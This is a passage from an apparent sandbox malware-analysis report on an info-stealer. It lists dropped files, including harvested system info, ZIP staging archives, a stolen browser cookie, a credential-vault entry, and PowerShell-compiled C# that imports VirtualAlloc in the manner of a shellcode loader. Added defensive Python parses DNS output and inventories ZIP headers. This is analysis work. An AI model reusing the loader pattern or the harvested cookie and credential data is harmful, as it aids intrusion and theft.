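    """
    result: Dict[str, List[str]] = {
        "server": [], "server_address": [], "name": [], "address": []}
    in_server_block = True
    last_target: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            in_server_block = False   # first blank line ends the resolver block
            continue
        m = _FIELD.match(line)
        if not m:
            if last_target and _IP.match(line):
                result[last_target].append(line)   # continuation address
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        last_target = None
        if key == "server":
            result["server"].append(value)
        elif key.startswith("address"):
            last_target = "server_address" if in_server_block else "address"
            if value:
                result[last_target].append(value)
        elif key == "name":
            result["name"].append(value)
    return result


def external_ip_lookup(parsed: Dict[str, List[str]]) -> Optional[Dict[str, str]]:
    """Return a finding when a resolved name is a what-is-my-IP service."""
    for name in parsed["name"]:
        if name.lower().rstrip(".") in EXTERNAL_IP_LOOKUP_NAMES:
            return {
                "name": name,
                "public_ip": parsed["address"][0] if parsed["address"] else "",
                "resolver": parsed["server_address"][0] if parsed["server_address"] else "",
            }
    return None


def foreign_resolver(parsed: Dict[str, List[str]]) -> Optional[str]:
    """Resolver address used for the query if it is not on the trusted list."""
    for addr in parsed["server_address"]:
        if addr not in TRUSTED_RESOLVERS:
            return addr
    return None
```

Run over process-output captures or EDR "nslookup.exe" command-line telemetry; a hit on both functions at once (what-is-my-IP name queried against a public resolver named on the command line) is the pattern this sample shows.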
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):51527
                                                        Entropy (8bit):4.037117443902078
                                                        Encrypted:false
                                                        SSDEEP:1536:WMo5mDUI+p0C7fZtPWS2/4CXW+kmwjlC4xuLGdv/ltLDH6i2GawcWGuwZtuKbuYF:WMgB9QD
                                                        MD5:C7A2F628DCF3F85CE0F22072367AB241
                                                        SHA1:B271D32EA3E80C7032905E77C8CFB204D4586646
                                                        SHA-256:617784E5DC452EF14C733D51EF3C1C78FF227BDE7FBC0EF185518405D0A74744
                                                        SHA-512:73D9D8445C72B49F7AFD38E5E3F58A26A3FFBA258F8B27A8387729978E0446F92F1FADC10409E3248714B97B8904F1C7D509C06E223897A4AE709CD3286ED772
                                                        Malicious:false
                                                        Preview:..Host Name: computer..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 6/27/2019, 3:49:21 PM..System Boot Time: 2/26/2022, 10:41:46 AM..System Manufacturer: 9KPUUrhOTYlp6ub..System Model: lfvCW2wz..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: 9LT2K L88M8, 6/25/2021..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale:
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):2192
                                                        Entropy (8bit):4.508807162396169
                                                        Encrypted:false
                                                        SSDEEP:48:LjmD3CNY2+3JxGK/JIjW37Xi7ZkgTMyErcCGuJUbCFRZC:LjmDyu2uHEN2ad+USy
                                                        MD5:283BF832B79AAEB537B565120932F2A5
                                                        SHA1:B54B0319174E531BB29691F54DEB21A27923EBFF
                                                        SHA-256:FD249DEFC2ED59284514EB5E6422E241B23C964C1C0F5B20A1082A866939CD5B
                                                        SHA-512:9C73F3DECB76FEEBE10CF72A744FFD5F115BF30FEA811056927A6DCB7D6412A31ED22764814F9B1F79B7FAA9127B00B421F89E345EF11E4483C3E2875E9ED3D6
                                                        Malicious:false
                                                        Preview:..Host Name: computer..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 6/27/2019, 3:49:21 PM..System Boot Time: 2/26/2022, 10:41:46 AM..System Manufacturer: 9KPUUrhOTYlp6ub..System Model: lfvCW2wz..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: 9LT2K L88M8, 6/25/2021..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale:
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:dropped
                                                        Size (bytes):228
                                                        Entropy (8bit):5.658648125232449
                                                        Encrypted:false
                                                        SSDEEP:3:vhjnl/lk/Pty7doMLz+iFmoATVffEjxdHIcX6HXIlfzUU2v9qInll1/lk/Pty/lb:5jttz+mmRVXYxdocX2Il6nlzkOVl+lIn
                                                        MD5:FDFBDE5D49536CED9C27DB86286777E2
                                                        SHA1:0D2786D903F7F23EA42737469CCE0B692FEFE216
                                                        SHA-256:28D47152041EFA538E81BD143B621254D43ABAE88B5B0B3E917B266698633AB1
                                                        SHA-512:028650BB005585508CAD066C56C1B298984F9820F7E8689AD9F715C790C34EA40C48225C1D478B2A1942C1266420FBC11CACE4C1C9991B0AFE5142A376EB0325
                                                        Malicious:false
                                                        Preview:PK............@...t...........D8E.bin..1..@...@...,$e`..).....v.r.=vWC~.....f.....Y..3Cu.G.Lcd..qY ......b2.#.Y..;.......k..}c.XO.I..}v.9?.Hh..%.^.PK..............@...t.........................D8E.binPK..........5.........
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:dropped
                                                        Size (bytes):412
                                                        Entropy (8bit):6.836864258334393
                                                        Encrypted:false
                                                        SSDEEP:12:5jxf4sSBMtothqUWWWUXbeuj29Trx/f5Yajtn:9xf4sSBCqAWWnTpfJtn
                                                        MD5:49B7CE4DF08EEAA8EF83CBD75C92B206
                                                        SHA1:B821F695DA61B19831C426030128FE752FBEB158
                                                        SHA-256:DB4726A19EB763CD9C9C93A28E3A9F621DBFA19813B4A5141D54952DB3A7C659
                                                        SHA-512:5A6BC3BE9652FAC414C510E285318AD513969DD470588569A84A1A12E247E02BC28A8441AD49DB9B535EE76BA86ABE07E85E5863F103858F215EB8EA1E3AC1A5
                                                        Malicious:false
                                                        Preview:PK............X4..,...z.......C9B.bin=.]o.0...K.....Iv..:D.3..T.J[.Vq......O....h.\... \.......`.r....EE.G.4&]M.,..!....m .6...J..%...}.UK4.....Q:s...(.M5...Ozl5..G..1...UC....>._.J.H.....J=\.>....36....,*;kU.~FKo.B|/ph.3..h.c..A......*4...9T.._\ys..4_...3._$=!..{.../w.IbB..o.=R...dY..7kN.?q.(Mn|.jE....;.c.o}zQ.e.._.PK..............X4..,...z.....................C9B.binPK..........5...Q.....
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:modified
                                                        Size (bytes):9373
                                                        Entropy (8bit):7.969688687051471
                                                        Encrypted:false
                                                        SSDEEP:192:zOYOv4MyLGQcHMHrVF6xsxIAQib5UwMA2Gp5XJe5r:Uv4rUHgrj6sSAlLRrXJex
                                                        MD5:DC2925093A6793DB90E71F34D0DA9D51
                                                        SHA1:B50166DDC6DDCAFF7644C37EEF03DC71B3BB22A7
                                                        SHA-256:514D4B65B3BCB2059C0D908963FB7CF8A9BE3C9BA0D575462186E01B51DE03F8
                                                        SHA-512:161691FCEDCAEAF6A3E834F78645E3E09A7D1DB69FC78FB49DB2DB38999A5554BB12EC664CC0F65C8A5B2A3BE8879502DA6C4229681BB616C4E3A8CEE81D7ADA
                                                        Malicious:false
                                                        Preview:PK..............}-$..G.......E09.bin.}{s.....|....l......%J.6..#.v.R..I..u...;5....)K2.0g.9.....D..h4.......e.....a..O./....z.~_z...<. .];..p...n..O. .........7.^...3.L.K.*\.k.(s=G 4i6..lm.i.....w..8.c+.p.b..kw..wjM.......$..c.VM.._..n.3/u.8.Q...0..z.n.6n...9..S..*./E..L.....%7..D..N...J...(".Z..: mQ.h..d.L....,O......:|.m.;...(.?..:..%.....0...0L....0.\.F.,..._.......!........f.w/.e....A.^7..n|/?..|.`..vVV..2.D$T....{OJB....9{.N8..?.../...y=U.Z...=.0.2.(r....>. s.D....,...|..fG.vx....W..|......s.P{.....K.n|..Z...S.....".'x.u.s.Wb|.o?\Z....].e>....m..k..N...$.xn..>..n.....t...w. ....j..L.7.`......o.t!.....S..O..........G..........(.,..a..c.....0G~)5....l.....\.Zy....'I.....8.j..g.t..9.~....J....^wp.Y .&....rdX.$L]..K...R.a.#.t....@............d....p.....]..b-xxe./.t.>..N..3...5J....cP...$.z6....a.Q...z%|v7..e...0.@....zU...$...Tdh._..a...sH..C.V3C..'.C.(..h...|&..g...F.6k4./..v_..(..b-v..=.)0l`*...@...<.(H.|l..`.`..B..0yNQ...<.F.s].W.B
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):378
                                                        Entropy (8bit):5.599881960561245
                                                        Encrypted:false
                                                        SSDEEP:6:YM6jkk4RTML/pU98M7ETSHp926Sfp2LiGhFEbhTqKxUNHdHZ2HmwhZZZHwFnAVN:YJkk4RoL/p4vE6UxfELiKwsb9HZ2pHRL
                                                        MD5:4CFD7AAC201D285D1EB218F0043BB0E8
                                                        SHA1:37A3071C28DCB2D07F0FFFB4AB00863A3A396C03
                                                        SHA-256:ED0EFDBE241441D7C0A2C23B612916F757E935F5970EC2BAE86744F659D01E75
                                                        SHA-512:80FAF7B9B4E3A749F186F4E9E5E0F230EE20ED95CAA028621B262D86F69470BCC66BC19E5FD81E5C70DF7042C1F6C7FE81EBE4521F24E018F74B859CD02C79CC
                                                        Malicious:false
                                                        Preview:{"id":0,"agent":"CR","domain":".google.com","expirationDate":1617262195,"hostOnly":false,"httpOnly":true,"name":"NID","path":"/","sameSite":"false","secure":true,"session":false,"storeId":"0","value":"204=TAJoBZJmGymg7hmIhx3Pl2B_ihALX0aygaD3k_6aC7ZxEK7XXCNSCdw1ngcPD2GKb8blK9BMvnrjIC7LQudAB_6nqtij7uM-AmmmXBhTbFN20087xdr3Z7uOpVj33C0KRQne2C-F8m9XNwnFH3I5zkA8uxAkwvE0BSBiqum7_78"}
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):176
                                                        Entropy (8bit):4.832266387295497
                                                        Encrypted:false
                                                        SSDEEP:3:1D3YJkcidTWXH+CDcNY7gwWASAcX4CDcNY7gwWARKaJFvVoXxOkcidcWSKXBFvn:uJkcilWXeCQNY7gZASAbCQNY7gZAdJFm
                                                        MD5:7F4BAB53E86D1F77B9A69B4BEC3ED22A
                                                        SHA1:66D613BD2DCD6743C4185C09BFD1CA40B0964C88
                                                        SHA-256:F5CE776775D9EBFBEA69837550D59204A8521B9553EB243656A7B12FF5D57D11
                                                        SHA-512:0139A01E0170D7CFBE3BDA0D8307D49DAB442976A5E61F02993B139BF53C23639F162FF8B5842792FE76812CD798B649F567BECDA88699523688A4C3A34C39A3
                                                        Malicious:false
                                                        Preview:type=ED, name=02mhakedhkeskfde, address=MicrosoftAccount:target=SSO_POP_Device, server=MicrosoftAccount:target=SSO_POP_Device, port=0, ssl=0, user=02mhakedhkeskfde, password=..
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                                        Category:dropped
                                                        Size (bytes):1328
                                                        Entropy (8bit):3.9888712937502846
                                                        Encrypted:false
                                                        SSDEEP:24:H1e9E2+fPtDfHFuQhKdNWI+ycuZhNH3akSUgPNnq9qd:XJlzKd41ulH3a3U4q9K
                                                        MD5:891E8CF61EBFAA4D51E0B4A09BFC9262
                                                        SHA1:930D5FC6BE5A83C6B643D811DD307FDF0494C706
                                                        SHA-256:814C5C14ADFEB94477037E31E2F9BD44F0D161B8A4948F2B511F64C0A58DAFBF
                                                        SHA-512:3FCDF82BAF065AD24CEB7C66017A50E92A76F110AD2A682F5DC56ADE73735B87EB105956AAF4D2FA5123621A234993E90D8A7739874861399FC8AF1E43F06156
                                                        Malicious:false
                                                        Preview:L...~.rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP...............Hr;(.wSRz2..2,..........4.......C:\Users\user\AppData\Local\Temp\RES3A11.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                                        Category:dropped
                                                        Size (bytes):1328
                                                        Entropy (8bit):3.984342590329363
                                                        Encrypted:false
                                                        SSDEEP:24:Hfe9E2+f6S5DfH0hKdNWI+ycuZhN6akSyPNnq9qd:Bv9mKd41ul6a3eq9K
                                                        MD5:DBC97AAABA8982682A073E1F6DC665C1
                                                        SHA1:536B1F147A18FF1467E49FD670E4F79F8466B371
                                                        SHA-256:944E5CB56A02CD6CD0773F1FBAF4F3D598AA0227DFB6169B59608EFC9DE5D98D
                                                        SHA-512:70829F56521DC9C98776F4D35D8FDD0E525EBF13DF9C18A33E3946BF7084A20A797C24E2B49E58271142EC10A6E756D839B999EABAE96810035323AF30930EC4
                                                        Malicious:false
                                                        Preview:L.....rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP...............D*{_sd.p.:.bW............4.......C:\Users\user\AppData\Local\Temp\RES5431.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
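The three PK archives dropped by explorer.exe (entry names D8E.bin, C9B.bin and E09.bin, "at least v2.0 to extract", Encrypted: false) are the staging format for harvested data before upload, and every record above carries the same Entropy (8bit) and MD5/SHA1/SHA-256/SHA-512 fields; the two 1-byte files containing "1" give check values for those fields. The following added example, not code from the Joe Sandbox report, walks a ZIP's local file headers without inflating anything, so a stage can be inventoried without executing or decompressing untrusted content, and reproduces the entropy and digest fields. The archive is constructed in memory because the real archive contents are not in the report; only the entry name D8E.bin and the check values for the "1" file are taken from it.

```python
"""Inventory a dropped ZIP stage from its headers and reproduce the report's
Entropy (8bit) and digest fields.

Added example for this report, not sandbox code. The archive and its payload
are constructed here; D8E.bin is the entry name the report shows.
"""
import hashlib
import io
import math
import struct
import zipfile
from collections import Counter
from typing import Dict, List

LOCAL_HEADER_SIG = 0x04034B50                  # "PK\x03\x04"
LOCAL_HEADER = struct.Struct("<IHHHHHIIIHH")   # 30-byte fixed part of a local header


def shannon_entropy_8bit(data: bytes) -> float:
    """Bits per byte: 0.0 for a single symbol, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> Dict[str, str]:
    """Upper-case hex digests in the four algorithms the report lists."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def list_local_entries(blob: bytes) -> List[Dict[str, object]]:
    """Describe each entry from its local file header; never inflates data.

    Stops at the first non-local signature (the central directory). If an
    entry was written with the data-descriptor flag (bit 3) its sizes are
    zero in the local header and the walk cannot jump past it, so it stops.
    """
    entries: List[Dict[str, object]] = []
    off = 0
    while off + LOCAL_HEADER.size <= len(blob):
        (sig, version, flags, method, _mtime, _mdate, crc, csize, usize,
         fnlen, extralen) = LOCAL_HEADER.unpack_from(blob, off)
        if sig != LOCAL_HEADER_SIG:
            break
        name_start = off + LOCAL_HEADER.size
        name = blob[name_start:name_start + fnlen].decode("cp437", "replace")
        entries.append({
            "name": name,
            # 20 -> "2.0": the "at least v2.0 to extract" in the File Type field
            "min_version": f"{version // 10}.{version % 10}",
            "method": {0: "stored", 8: "deflate"}.get(method, f"method {method}"),
            "encrypted": bool(flags & 0x1),   # traditional PKWARE encryption bit
            "compressed_size": csize,
            "uncompressed_size": usize,
            "crc32": f"{crc:08X}",
        })
        if flags & 0x8:
            break
        off = name_start + fnlen + extralen + csize
    return entries


SAMPLE_PAYLOAD = b"Host Name: computer\r\nOS Name: Microsoft Windows 10 Pro\r\n" * 4


def build_sample_stage() -> bytes:
    """Constructed stand-in for the dropped D8E.bin archive (payload is made up)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo("D8E.bin", date_time=(2022, 2, 26, 10, 41, 46))
        zf.writestr(info, SAMPLE_PAYLOAD, compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()
```

Reading headers with struct rather than opening the blob in zipfile keeps malformed or hostile archives from reaching the inflater; the same digests() call on the dropped files should reproduce the hashes printed in the records above.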
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:MSVC .res
                                                        Category:dropped
                                                        Size (bytes):652
                                                        Entropy (8bit):3.1131838152508884
                                                        Encrypted:false
                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8ak7YnqqyPN5Dlq5J:+RI+ycuZhN6akSyPNnqX
                                                        MD5:442A7B5F7364FA70EE8E3AD06257EF01
                                                        SHA1:EB70DAFCE9B42DDE723E87C1D4E0FB00C92EB40A
                                                        SHA-256:19A46984BFBCA971C3C72A4473E74D5FFCBEF75024382D9B09EDFC8FEA028C7F
                                                        SHA-512:98E5329A3692507E6A18741175846B6D6A76F58A24073025759CE20C0E9DFE0316774E5B51C513D8C02EC840664594EEF8A6A851EBF20DDF8AE9813D1EAD14F2
                                                        Malicious:false
                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text
                                                        Category:dropped
                                                        Size (bytes):392
                                                        Entropy (8bit):4.988829579018284
                                                        Encrypted:false
                                                        SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                                                        MD5:80545CB568082AB66554E902D9291782
                                                        SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                                                        SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                                                        SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                                                        Malicious:false
                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):369
                                                        Entropy (8bit):5.26479255454489
                                                        Encrypted:false
                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fXus0zxs7+AEszIwkn23fXuy:p37Lvkmb6KRffu3WZEiffuy
                                                        MD5:3A3B00B94E0B79EF22728B1A7FE98FA8
                                                        SHA1:3B07F3391A6398D4307CBB156E78908A3FD144CB
                                                        SHA-256:59645E418E08488C8010F2CEA8259963463A9EDD80D56B3EEC36D4F83941CCEC
                                                        SHA-512:FFB6E269A9E6D3CD155AE246FA6115B3AD16AA6C58A09B6480F7A9E457DED43B39D7511B5A70179ED58BE9AB8FFD7D0C0E1D88F7FFE04EC508594D3AAD46E34D
                                                        Malicious:false
                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.0.cs"
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3584
                                                        Entropy (8bit):2.597367616720797
                                                        Encrypted:false
                                                        SSDEEP:24:etGSs/u2Bg85z7xlfwZD6egdWqtkZf+YP38FWI+ycuZhN6akSyPNnq:61Yb5hFCD6fWdJ+Yv8Q1ul6a3eq
                                                        MD5:05D321F29278AB204135CE4318DA43DE
                                                        SHA1:BF2BA1B03308E4DC8F4752E8AC20D6F3A5E555A0
                                                        SHA-256:1ED702400166E5CF4B6633A7E27A2A280EBA2106926AFE247739D768E99DAD9C
                                                        SHA-512:EDB677275B5DB2205FA3DAAE5C428CC018CC7BC77A2A2C16533F83F2829308B64DAE8F4F160DBFFA997127DDF4FA63C8A6F885556CF0EC4AD9D41469B2896CB4
                                                        Malicious:false
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                                        Category:modified
                                                        Size (bytes):866
                                                        Entropy (8bit):5.342582156847717
                                                        Encrypted:false
                                                        SSDEEP:24:AId3ka6KRffukEiffurKaM5DqBVKVrdFAMBJTH:Akka6CREuIKxDcVKdBJj
                                                        MD5:2E43C2C9F10216D05447C47E401EA080
                                                        SHA1:4406C4A0FBA4CD769CDCB4A91ACF931E527E88D8
                                                        SHA-256:27EC3B2FFC4EA97ADC031A783C8F9C1232F73CACD297C77581575F84253C46A7
                                                        SHA-512:ECB81C0381F69948C2B53E408BBE6E9AE92EC81524213F51CD5FCE06F89E1E12806E62377ECBD5428CC0A50BACF666BB832488C4B7EE42EF9637A429AFBEF370
                                                        Malicious:false
                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:MSVC .res
                                                        Category:dropped
                                                        Size (bytes):652
                                                        Entropy (8bit):3.119272920863618
                                                        Encrypted:false
                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grylWOak7YnqqUWPPN5Dlq5J:+RI+ycuZhNH3akSUgPNnqX
                                                        MD5:48723B28EEA47753527A32A9E3B1322C
                                                        SHA1:E7CD0D5366F4F0B7010764B7E903363858FCDAA7
                                                        SHA-256:2F7D0427BFF06099BF89A296D019DA107C9D250C327E264E7A0BDC68DB163EB4
                                                        SHA-512:F3DEA9E54C7A45B4B3ED0A4EF4324B59DC4E8FF4C0D5F9E2C9BFC362C69F4C8DAC8137EBD6D3E2AE781A988815A67512F06E33212E9120FEB1D15814203F628F
                                                        Malicious:false
                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text
                                                        Category:dropped
                                                        Size (bytes):403
                                                        Entropy (8bit):5.058106976759534
                                                        Encrypted:false
